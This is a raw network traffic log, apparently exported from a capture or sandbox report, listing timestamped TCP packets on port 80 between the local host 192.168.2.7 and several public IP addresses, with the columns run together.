                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.165190935 CET5017680192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.166313887 CET805017634.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.170978069 CET805017634.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.209387064 CET805017447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.214387894 CET5017480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.222239971 CET805017447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.225184917 CET5017480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.007004976 CET805017634.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.010329962 CET5017680192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.019579887 CET805017634.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.019634008 CET5017680192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.039355040 CET5017780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.047558069 CET805017734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.047626019 CET5017780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.047966957 CET5017780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.047981977 CET5017780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.052978039 CET805017734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.052995920 CET805017734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.161540031 CET5017880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.166532993 CET805017818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.166682959 CET5017880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.166762114 CET5017880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.166762114 CET5017880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.172293901 CET805017818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.172821999 CET805017818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.837994099 CET805017818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.838217974 CET5017880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.843636990 CET805017818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.843826056 CET5017880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.852935076 CET5017980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.858167887 CET805017954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.858253956 CET5017980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.858365059 CET5017980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.858382940 CET5017980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.863378048 CET805017954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.863435984 CET805017954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.881922960 CET805017734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.882117987 CET5017780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.887274027 CET805017734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.887351036 CET5017780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.893702984 CET5018080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.898834944 CET805018034.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.898919106 CET5018080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.899009943 CET5018080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.899025917 CET5018080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.904099941 CET805018034.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.904112101 CET805018034.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.572284937 CET805018744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.701014996 CET805018613.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.701390028 CET5018680192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.708635092 CET805018613.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.708734035 CET5018680192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.714037895 CET5018880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.719089985 CET805018818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.719197989 CET5018880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.719450951 CET5018880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.719476938 CET5018880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.724090099 CET5018780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.724332094 CET805018818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.725409985 CET805018818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.727018118 CET5018980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.732044935 CET805018944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.732144117 CET5018980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.732295990 CET5018980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.732316971 CET5018980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.737384081 CET805018944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.737396002 CET805018944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.397389889 CET805018944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.397620916 CET5018980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.398271084 CET805018818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.398416042 CET5018880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.403157949 CET805018944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.403259039 CET5018980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.403501987 CET805018818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.403556108 CET5018880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.410983086 CET5019080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.411858082 CET5019180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.416271925 CET805019044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.416398048 CET5019080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.416529894 CET5019080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.416541100 CET5019080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.416867018 CET805019144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.416922092 CET5019180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.417191982 CET5019180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.417210102 CET5019180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.421946049 CET805019044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.421983004 CET805019044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.422558069 CET805019144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.422569990 CET805019144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.085973978 CET805019144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.086246014 CET5019180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.088438988 CET805019044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.088587999 CET5019080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.093173981 CET805019144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.093241930 CET5019180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.095904112 CET805019044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.095956087 CET5019080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.102561951 CET5019280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.102561951 CET5019380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.108753920 CET805019218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.108768940 CET805019318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.108851910 CET5019280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.109004974 CET5019380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.072129965 CET805019954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.072226048 CET5019980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.078428030 CET5020080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.083544970 CET805020018.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.083642006 CET5020080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.083924055 CET5020080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.083961010 CET5020080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.088880062 CET805020018.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.088912010 CET805020018.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.668560982 CET805019813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.668878078 CET5019880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.674529076 CET805019813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.674607992 CET5019880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.682765007 CET5020180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.687829971 CET805020135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.687938929 CET5020180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.688057899 CET5020180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.688072920 CET5020180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.693028927 CET805020135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.693247080 CET805020135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.931615114 CET805020018.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.931906939 CET5020080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.942225933 CET805020018.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.942337036 CET5020080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.947957993 CET5020280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.953001976 CET805020218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.953109026 CET5020280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.953206062 CET5020280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.953216076 CET5020280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.958389044 CET805020218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.958426952 CET805020218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.539189100 CET805020135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.557943106 CET5020180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.563410997 CET805020135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.564318895 CET5020180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.571918011 CET5020380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.576945066 CET805020318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.577008009 CET5020380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.577107906 CET5020380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.577126026 CET5020380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.582174063 CET805020318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.582294941 CET805020318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.417339087 CET805020218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.418436050 CET5020280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.424869061 CET805020218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.424932003 CET5020280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.432499886 CET5020480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.437623024 CET805020447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.437685966 CET5020480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.437778950 CET5020480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.437798977 CET5020480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.444259882 CET805020447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.445385933 CET805020447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.724073887 CET5020380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.725521088 CET5020580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.730407000 CET805020518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.649919033 CET805021235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.650033951 CET5021280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.650212049 CET5021280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.650237083 CET5021280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.656181097 CET805021235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.656194925 CET805021235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.945308924 CET805021018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.945595026 CET5021080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.951071978 CET805021018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.951127052 CET5021080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.972574949 CET5021380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.977730036 CET805021318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.977811098 CET5021380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.977901936 CET5021380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.977911949 CET5021380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.983232975 CET805021318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.983246088 CET805021318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.496531010 CET805021235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.496757984 CET5021280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.501900911 CET805021235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.501976013 CET5021280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.522947073 CET5021480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.528124094 CET805021434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.528182983 CET5021480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.528624058 CET5021480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.528650045 CET5021480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.533488989 CET805021434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.533513069 CET805021434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.982690096 CET805021318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.984816074 CET5021380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.990464926 CET805021318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.990575075 CET5021380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.002197981 CET5021580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.007195950 CET805021544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.007273912 CET5021580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.007777929 CET5021580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.007818937 CET5021580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.012583971 CET805021544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.012912035 CET805021544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.359174967 CET805021434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.359854937 CET5021480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.365526915 CET805021434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.368323088 CET5021480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.380388975 CET5021680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.385996103 CET805021644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.386843920 CET5021680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.387003899 CET5021680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.387003899 CET5021680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.393644094 CET805021644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.393678904 CET805021644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.672259092 CET805021544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.708473921 CET805021544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.708604097 CET5021580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.718000889 CET5021580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.722909927 CET805021544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.744071007 CET5021780192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.484277964 CET5022480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.484304905 CET5022480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.489239931 CET805022434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.489599943 CET805022434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.529273987 CET805022218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.529418945 CET5022280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.535466909 CET805022218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.535554886 CET5022280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.281964064 CET6007580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.287084103 CET806007518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.287179947 CET6007580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.287333012 CET6007580192.168.2.718.246.231.120
